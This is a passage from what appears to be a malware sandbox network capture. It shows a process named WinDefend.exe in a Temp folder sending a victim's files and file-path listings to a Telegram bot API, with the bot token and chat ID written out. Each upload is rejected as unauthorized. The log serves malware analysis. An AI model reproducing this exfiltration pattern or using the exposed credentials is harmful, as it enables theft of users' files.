chat_id=1655240967&text=File%3A+32.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:34:57 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:57 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	61147	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:56 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="e2042cd9-8c14-49b6-9d9e-0cc585191769" Host: api.telegram.org Content-Length: 116285 Expect: 100-continue
2024-05-23 13:34:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:57 UTC	40	OUT	Data Raw: 2d 2d 65 32 30 34 32 63 64 39 2d 38 63 31 34 2d 34 39 62 36 2d 39 64 39 65 2d 30 63 63 35 38 35 31 39 31 37 36 39 0d 0a Data Ascii: --e2042cd9-8c14-49b6-9d9e-0cc585191769
2024-05-23 13:34:57 UTC	103	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 53 74 61 6e 64 61 72 64 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 53 74 61 6e 64 61 72 64 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=Standard.pdf; filename*=utf-8''Standard.pdf
2024-05-23 13:34:57 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 32 0d 25 e2 e3 cf d3 0d 0a 34 35 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 20 0d 2f 4f 20 34 38 20 0d 2f 48 20 5b 20 39 35 36 20 32 30 36 20 5d 20 0d 2f 4c 20 31 31 35 39 35 37 20 0d 2f 45 20 39 33 38 33 20 0d 2f 4e 20 31 34 20 0d 2f 54 20 31 31 34 39 33 39 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 72 65 66 0d 34 35 20 32 35 20 0d 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 38 34 37 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 39 31 37 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 31 36 32 Data Ascii: %PDF-1.2%45 0 obj<< /Linearized 1 /O 48 /H [ 956 206 ] /L 115957 /E 9383 /N 14 /T 114939 >> endobj xref45 25 0000000016 00000 n0000000847 00000 n0000000917 00000 n0000001162
2024-05-23 13:34:57 UTC	4096	OUT	Data Raw: b3 70 0c 17 f7 b3 42 4c 8d 52 23 24 85 ce 23 e5 2a cb 78 c1 89 8b 8b ec 75 53 65 29 93 f3 48 01 eb a8 00 4f a5 c0 d5 8e 2d dd 1c 5c 2a b9 c0 5b f3 81 08 66 31 fa cf 28 be eb d5 ca d4 dc af 6a 1d 9f 99 c3 96 79 0e b3 1e 6d 0c 27 14 1d aa 78 88 0f af 0d f0 e2 37 80 58 0d 42 d8 77 3f e8 92 a1 16 47 d4 13 7b 55 8b 8f 98 39 86 38 ee a4 f6 7e 0b de da 32 a8 97 5f 22 67 6f 35 bb 2c a4 69 83 c4 3b 3a 9a f8 8d a4 cc c5 7b 40 20 5e d8 77 e5 ac 41 d5 71 b6 45 96 6a 4e 3e 6b bb 16 0e 67 cd d7 b9 aa cb 24 66 e2 e0 09 5a fc b6 a6 b2 fa ba 41 60 9a 53 75 05 3b 43 84 2c a8 53 07 68 b7 b1 b9 de ac dc 42 e9 b4 a3 2f e0 1e 45 45 f0 2c 2c e8 b8 9b d8 e3 97 f4 f3 1b 0e 44 82 5e 0d 65 6e 64 73 74 72 65 61 6d 0d 65 6e 64 6f 62 6a 0d 35 36 20 30 20 6f 62 6a 0d 38 35 30 20 0d 65 Data Ascii: pBLR#$#xuSe)HO-\[f1(jym'x7XBw?G{U98~2_"go5,i;:{@ ^wAqEjN>kg$fZA`Su;C,ShB/EE,,D^endstreamendobj56 0 obj850 e
2024-05-23 13:34:57 UTC	4096	OUT	Data Raw: 65 66 61 75 6c 74 29 0d 2f 46 72 65 71 75 65 6e 63 79 20 36 30 20 0d 2f 41 6e 67 6c 65 20 34 35 20 0d 2f 53 70 6f 74 46 75 6e 63 74 69 6f 6e 20 2f 52 6f 75 6e 64 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 36 36 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 54 79 70 65 20 2f 45 78 74 47 53 74 61 74 65 20 0d 2f 53 41 20 74 72 75 65 20 0d 2f 4f 50 20 66 61 6c 73 65 20 0d 2f 48 54 20 36 35 20 30 20 52 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 36 37 20 30 20 6f 62 6a 0d 3c 3c 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4c 65 6e 67 74 68 20 36 34 20 30 20 52 20 3e 3e 20 0d 73 74 72 65 61 6d 0d 0a 48 89 6d 55 4b 8e 1d 39 0c db 07 c8 1d ea 04 86 65 7d 2c 9d 27 c0 ac 3a f7 df 0e 29 d5 0b 92 20 ab 07 b2 4b b2 48 7d fa f9 fe 4d ef 5e 47 f2 31 b9 2b cc 1f 8d Data Ascii: efault)/Frequency 60 /Angle 45 /SpotFunction /Round >> endobj66 0 obj<< /Type /ExtGState /SA true /OP false /HT 65 0 R >> endobj67 0 obj<< /Filter /FlateDecode /Length 64 0 R >> streamHmUK9e},':) KH}M^G1+
2024-05-23 13:34:57 UTC	4096	OUT	Data Raw: 7f ff 5f ad ea 21 fb 85 e7 29 9c 96 fe c1 a5 cf ae d8 2b e8 94 0a ca 9b f5 0e 53 77 de 4a e1 eb 18 a5 ed 45 b4 1b 0a 79 5a be 94 45 16 33 61 22 db 94 53 88 93 76 91 48 ce 0a f4 61 59 48 50 3c 7f 0c ee d6 b3 90 fc f9 17 c4 d6 02 57 7e 17 a1 84 1e 68 37 f2 ad 18 85 db 69 da 55 8a 52 17 83 1a e3 68 15 a5 94 90 7f fa bb 6d 98 bc d3 ed c0 a3 ad e5 19 69 cb 47 1d c3 71 50 11 2a f6 50 9e fd 56 48 a8 0f b6 5a 6a d3 20 9a 12 ca fa 50 bc 62 54 6c a1 3e 48 53 db 83 7a 6d 2a 86 49 88 19 2a 3c bc 53 7b d3 1d e9 98 28 55 9a a2 9e b2 1d 5b 2f 32 08 df ee 2c e3 05 2f cd 98 c3 ca b8 f7 f7 d9 16 36 26 9b 35 65 7c ee 5f 57 32 88 73 dd 76 68 ee b7 e4 5b 8f 56 e3 86 15 ab 8b 20 84 88 58 32 5d 2a 13 85 20 7d e5 3d ae 3c 67 01 71 f6 a1 c7 29 7f c3 8c bc d8 12 44 52 dc d3 82 92 Data Ascii: _!)+SwJEyZE3a"SvHaYHP<W~h7iURhmiGqPPVHZj PbTl>HSzmI<S{(U[/2,/6&5e\|_W2svh[V X2] }=<gq)DR
2024-05-23 13:34:57 UTC	4096	OUT	Data Raw: 68 97 a5 3f 9f 2c a5 24 a2 54 1f fd e5 a6 5a c7 51 82 a9 dc b6 f9 79 90 0d 1d d6 6c b5 17 88 cb 96 a8 f4 9a 48 16 cb c5 da 1b 16 8b 84 c1 a2 62 6a 94 bc bc 1c 66 82 cf b7 fb a3 7d e2 ce 0c 54 bb a1 a3 80 73 df 92 09 61 bc 1c a1 76 f6 5b 92 d3 fd e7 b2 55 07 23 51 98 59 15 64 23 7b ce 8a 28 b3 4b ea 29 66 55 19 7f bd b8 2a 6f dc 92 f7 68 cc d7 2c 3e a9 9e 86 4c b3 04 c1 5c 9a 17 48 e4 bb f7 8f 89 74 4b e9 c8 fa d1 27 bd 34 16 ee 38 59 9b fe 9d 0a 80 97 9a d5 90 58 8b f8 72 a2 c3 2d 6b 02 f6 45 e1 5d 04 bc 9d 22 34 9d 92 82 24 22 ec d0 57 29 8f e3 43 da 1c 85 2b 47 10 e3 2a a3 61 75 44 53 7b 16 e6 15 3b ab 29 60 9c c2 c7 94 e1 fa a6 61 97 32 61 f3 19 a6 5f e2 5b 1b 78 42 44 e5 ae f5 4e d5 05 39 9e b1 66 88 d5 d7 e0 0d d6 3f 71 b7 f0 f7 98 f9 b7 e3 79 cf 65 Data Ascii: h?,$TZQylHbjf}Tsav[U#QYd#{(K)fUoh,>L\HtK'48YXr-kE]"4$"W)C+GauDS{;)`a2a_[xBDN9f?qye
2024-05-23 13:34:57 UTC	4096	OUT	Data Raw: ad ec 30 df f1 74 33 85 b9 e8 57 36 c1 da 41 68 4a 80 61 48 e6 7c 0b 7a 69 98 a1 40 6c f5 53 25 31 47 31 63 39 4d 4f fb d8 2f 30 a3 57 8e cc 7c 97 77 49 c3 dd fd fe ed 3d 0a 46 87 03 bc 10 d3 f3 77 39 3b 9c aa cb 9c dc fe 77 15 e5 ae 75 94 a1 a6 e1 c9 81 0e dc f6 d4 9d 05 a9 87 8e 4e 5a db b9 03 d3 e1 17 70 43 4e 7f b2 c3 9e 1a 78 5d 4c cc cb 65 37 8d 9a 68 b3 aa 95 d3 96 29 81 cb 66 0d f0 7b 57 e1 e5 2d b3 e2 fe c7 7b aa a8 36 be e7 f8 49 ee 63 4e 4e d3 34 23 52 c9 12 77 d7 47 72 eb d3 ac 27 99 3f 45 bc 0e 1b 83 53 48 24 0a 78 8e 37 cc 0c 2b 47 4b 68 d2 52 a6 8e 97 72 cf 65 9e 4d 57 11 4e d5 c1 96 18 e1 8a 3d 44 5a 58 0a 39 4c 7d 60 8a 33 cb 84 8b 6d 6e ea ea 61 2c 84 c3 ba ec 54 ee d3 34 5c c8 1a 79 c0 fb ec aa 7d 2e 81 5b c3 ff af e9 94 db 21 4f ab 7b Data Ascii: 0t3W6AhJaH\|zi@lS%1G1c9MO/0W\|wI=Fw9;wuNZpCNx]Le7h)f{W-{6IcNN4#RwGr'?ESH$x7+GKhRreMWN=DZX9L}`3mna,T4\y}.[!O{
2024-05-23 13:34:57 UTC	4096	OUT	Data Raw: be ff b6 63 a0 be d3 76 22 17 89 e0 7f 9a 38 04 83 9a cc 2e 09 25 35 f0 a8 1a 9a 31 9b 28 8f 1a b3 18 37 a5 9f f9 f0 c3 c2 04 a6 2c 25 6e e2 24 b0 b9 ea d6 7a 52 4b d8 92 cb b4 cd 74 12 13 c0 21 9a 27 f6 8e eb c3 8d df df e3 82 42 af fe b5 86 d7 ed ac 38 6e 31 a2 4d e5 1d ac cd 2e a6 88 95 cf 74 95 bb b8 fb b0 05 c4 9e 25 b6 07 e3 8f 82 68 ce 2a d2 34 61 f5 5d 46 5d d1 84 69 9a 48 4f 67 c0 41 66 bb e6 29 a6 34 30 c7 3b e3 4a 00 b6 31 37 fc 78 a1 5b d2 b2 32 f1 3f 3b 5b 33 97 06 0f 14 73 79 e2 9c 51 07 c3 74 4c 08 fc 00 54 3f 7c f1 45 ca 6d 1c 92 f4 b2 05 1f 7e fd db 4b 3c b5 73 51 ca 9d 54 1a 74 dc e8 ea 3a 34 71 8e fd 6d 53 54 f2 5d f4 67 8c 25 9a 2a b4 0a f9 2b 1c ce c4 e1 0e 6f 53 69 7d d6 2d f0 d8 96 81 ec ae dc d2 8a 0e a7 2d 5f 0f 26 a7 1c f8 84 62 Data Ascii: cv"8.%51(7,%n$zRKt!'B8n1M.t%h4a]F]iHOgAf)40;J17x[2?;[3syQtLT?\|Em~K<sQTt:4qmST]g%+oSi}--_&b
2024-05-23 13:34:57 UTC	4096	OUT	Data Raw: 5a 10 43 d8 a3 ba f2 dc b7 97 80 bb e8 60 cd 4f 9d 87 fa e3 a6 16 b5 29 ba 5c 6b 9a 62 6c 24 f6 7a 5b f9 de 3f a6 de 2c d6 4a cd c1 3d e4 77 2f ec 4d 32 04 75 f0 a5 50 d0 69 d6 ad bb 7c 11 9a 96 a9 b8 25 3e a2 a6 9e 30 36 bc ad a3 26 4f 35 01 99 4a 34 78 f5 84 88 25 6b ea 12 35 ab 8d b9 df f3 a7 8b c1 40 70 d0 35 e3 58 27 ea 8b e9 2a 38 a9 15 75 9a 26 0a 74 b2 13 a3 c7 11 50 4f 82 8a bc 06 c9 06 f6 54 ab c3 e9 1d 08 a9 7a 40 f5 c0 31 b5 b1 bb 84 f7 92 02 68 eb f3 d9 79 c5 f7 90 6d c4 db fa 93 15 5c 58 2d 14 fb b3 e2 7b da 99 d0 52 5b e0 a1 22 1a 0c 8d 3f 0a 41 aa 21 d4 21 a6 f1 48 c8 ec 71 2a 60 b0 76 63 2b 63 8a d4 c3 10 8c c5 20 c7 6e bf 62 11 37 50 66 e1 6d b3 8b 83 c2 10 42 1b 57 6f a0 4f 49 aa 35 79 99 66 b4 a1 5c 4c ac cf 45 62 5a b1 42 e6 fe ec be Data Ascii: ZC`O)\kbl$z[?,J=w/M2uPi\|%>06&O5J4x%k5@p5X'8u&tPOTz@1hym\X-{R["?A!!Hq`vc+c nb7PfmBWoOI5yf\LEbZB
2024-05-23 13:34:57 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:57 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	61150	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:57 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="62287d0f-0b6c-47b0-b6e4-ad01d529d89d" Host: api.telegram.org Content-Length: 1805 Expect: 100-continue
2024-05-23 13:34:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:58 UTC	40	OUT	Data Raw: 2d 2d 36 32 32 38 37 64 30 66 2d 30 62 36 63 2d 34 37 62 30 2d 62 36 65 34 2d 61 64 30 31 64 35 32 39 64 38 39 64 0d 0a Data Ascii: --62287d0f-0b6c-47b0-b6e4-ad01d529d89d
2024-05-23 13:34:58 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 33 32 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 33 32 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=32.png; filename*=utf-8''32.png
2024-05-23 13:34:58 UTC	1489	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 05 98 49 44 41 54 58 85 ed 97 cd af 25 45 19 c6 7f 4f 55 9f 73 ee c7 30 f7 e6 4e 06 66 01 33 17 95 38 41 82 4b 8d 89 91 84 8d 6b 4d dc 1a 43 cc c4 b0 c0 8d 89 24 18 e0 1f 60 cd 42 71 62 60 d4 0d fe 07 1a 63 a2 89 1b a3 26 0a 24 06 1c 61 84 61 26 ce 65 e6 ce 3d a7 bb ab 1e 17 d5 d5 a7 2f 33 10 36 ba a2 92 73 ba ab 4f d5 fb f1 bc cf f3 76 1d f8 74 7c c4 30 68 fa 79 0e 82 3f e1 67 58 7b 6c ff 27 71 18 0c e1 ff 90 d8 31 3f 1a 1e 4a 60 00 9e 73 b8 72 e5 c2 c6 66 db ce 67 87 87 1b 5d 77 73 a3 eb d3 2c d8 4d 4f 1f e7 29 86 ce 59 8a 96 fa 3e 02 38 87 ec 98 f3 ac 97 db 98 72 93 9b 94 45 9f 62 e8 62 d8 5a 1e ce e7 cb fd 07 1f 5c e9 85 17 56 48 79 ea 53 f5 e6 df Data Ascii: PNGIHDR szzIDATX%EOUs0Nf38AKkMC$`Bqb`c&$aa&e=/36sOvt\|0hy?gX{l'q1?J`srfg]ws,MO)Y>8rEbbZ\VHyS
2024-05-23 13:34:58 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 36 32 32 38 37 64 30 66 2d 30 62 36 63 2d 34 37 62 30 2d 62 36 65 34 2d 61 64 30 31 64 35 32 39 64 38 39 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --62287d0f-0b6c-47b0-b6e4-ad01d529d89dContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:58 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:58 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 36 32 32 38 37 64 30 66 2d 30 62 36 63 2d 34 37 62 30 2d 62 36 65 34 2d 61 64 30 31 64 35 32 39 64 38 39 64 2d 2d 0d 0a Data Ascii: --62287d0f-0b6c-47b0-b6e4-ad01d529d89d--
2024-05-23 13:34:58 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:58 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	61149	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:57 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="a01ca172-258d-4567-b02d-a69fa5315b13" Host: api.telegram.org Content-Length: 1439 Expect: 100-continue
2024-05-23 13:34:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:58 UTC	40	OUT	Data Raw: 2d 2d 61 30 31 63 61 31 37 32 2d 32 35 38 64 2d 34 35 36 37 2d 62 30 32 64 2d 61 36 39 66 61 35 33 31 35 62 31 33 0d 0a Data Ascii: --a01ca172-258d-4567-b02d-a69fa5315b13
2024-05-23 13:34:58 UTC	115	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 64 64 5f 61 72 72 6f 77 5f 73 6d 61 6c 6c 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 64 64 5f 61 72 72 6f 77 5f 73 6d 61 6c 6c 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=dd_arrow_small.png; filename*=utf-8''dd_arrow_small.png
2024-05-23 13:34:58 UTC	1099	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 29 08 06 00 00 00 2f 51 e9 f0 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 23 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 35 2d 63 30 32 31 20 37 39 2e 31 35 34 39 31 31 2c 20 32 30 31 33 2f 31 30 2f 32 39 2d 31 31 3a 34 37 3a 31 36 20 20 Data Ascii: PNGIHDR)/QtEXtSoftwareAdobe ImageReadyqe<#iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16
2024-05-23 13:34:58 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 61 30 31 63 61 31 37 32 2d 32 35 38 64 2d 34 35 36 37 2d 62 30 32 64 2d 61 36 39 66 61 35 33 31 35 62 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --a01ca172-258d-4567-b02d-a69fa5315b13Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:58 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:58 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 61 30 31 63 61 31 37 32 2d 32 35 38 64 2d 34 35 36 37 2d 62 30 32 64 2d 61 36 39 66 61 35 33 31 35 62 31 33 2d 2d 0d 0a Data Ascii: --a01ca172-258d-4567-b02d-a69fa5315b13--
2024-05-23 13:34:58 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:58 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	61151	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:58 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 194 Expect: 100-continue
2024-05-23 13:34:58 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:58 UTC	194	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 53 74 61 6e 64 61 72 64 42 75 73 69 6e 65 73 73 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 70 6c 75 67 5f 69 6e 73 25 35 43 41 6e 6e 6f 74 61 74 69 6f 6e 73 25 35 43 53 74 61 6d 70 73 25 35 43 45 4e 55 25 35 43 53 74 61 6e 64 61 72 64 42 75 73 69 6e 65 73 73 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 31 30 36 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+StandardBusiness.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5Cplug_ins%5CAnnotations%5CStamps%5CENU%5CStandardBusiness.pdf%0ASize%3A+106+KB
2024-05-23 13:34:58 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:58 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	61153	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:59 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:34:59 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:59 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 34 38 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+48.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:34:59 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:59 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	61154	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:59 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 191 Expect: 100-continue
2024-05-23 13:34:59 UTC	25	IN	HTTP/1.1 100 Continue
